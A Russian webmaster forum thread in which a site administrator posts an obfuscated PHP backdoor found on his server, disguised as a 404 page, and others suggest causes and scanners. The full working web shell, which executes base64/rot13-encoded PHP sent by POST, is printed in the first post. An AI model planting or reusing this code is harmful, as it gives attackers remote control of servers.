ЭНЦИКЛОПЕДИЯ СОВРЕМЕННОГО САЙТОСТРОЕНИЯ

Обнаружил вредоносный код на сайте. Что это значит?

Тема в разделе "Шеллы и вирусы на сайте", создана пользователем Jonny, 7 июн 2017.

  1. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    748
    Рейтинг:
    143
    Всем привет!
    Недавно я обнаружин на некоторых своих сайтах вредоносный код, вот его часть:
    chr(100)."a"."\x74"."\x61"])){$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])))

    Вот полный код вредоносного файла:
    PHP:
    <?php

    if(isset($_POST[chr(100)."a"."\x74"."\x61"])){$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])));die;}
    else{
        if(
    function_exists('headers_sent') && !headers_sent()){
            
    header('HTTP/1.0 404 Not Found',TRUE);
            
    header('Status: 404 Not Found',TRUE);
        }
    }

    ?><?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
      "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    <head>
    <title>Object not found!</title>
    <style type="text/css"><!--/*--><![CDATA[/*><!--*/
        body { color: #000000; background-color: #FFFFFF; }
        a:link { color: #0000CC; }
        p, address {margin-left: 3em;}
        span {font-size: smaller;}
    /*]]>*/--></style>
    </head>

    <body>
    <h1>Object not found!</h1>
    <p>


        The requested URL was not found on this server.

     

        If you entered the URL manually please check your
        spelling and try again.

     

    </p>
    <p>
    If you think this is a server error, please contact
    the webmaster.

    </p>

    <h2>Error 404</h2>
    </body>
    </html>
    Подскажите, что это за зараза и как она пробалась на сервер? Файл, с вредоносным кодом назван на сервере как thumbs_img.php
     
    #1
  2. Alex-Kelevra

    Alex-Kelevra Гуру

    Сообщения:
    451
    Рейтинг:
    143
    Род занятий:
    Спасатель
    Откуда:
    ЛНР
    @Jonny, файлы новые появлялись? Насколько я понимаю, то это следы взлома. Дыра. Есть вариант ее образования в следствии использования сторонних тем (кто-то мне рассказывал о таком случае). Попробуйте воспользоваться чем-нибудь типа "Айболита".
     
    #2
  3. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    748
    Рейтинг:
    143
    Вообще не понимаю, как взломали. Файл только 1 залили. Тот что выше. Про Айболита знаю, но не нужен в этот раз ручками все нашел по дате и поудалял.
     
    #3
  4. Alex-Kelevra

    Alex-Kelevra Гуру

    Сообщения:
    451
    Рейтинг:
    143
    Род занятий:
    Спасатель
    Откуда:
    ЛНР
    @Jonny, конкретно не скажу, но когда-то что-то подобное слышал. Говорили, что причиной стало использование тем оформления. Вроде там уже было прописано.
     
    #4
  5. alexeika

    alexeika Новичок

    Сообщения:
    2
    Рейтинг:
    1
    Откуда:
    Урал
    как сайт себя с этим кодом повел? контент открывался или 404 ?
     
    #5
  6. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    748
    Рейтинг:
    143
    На контент никак не повлияло.
     
    #6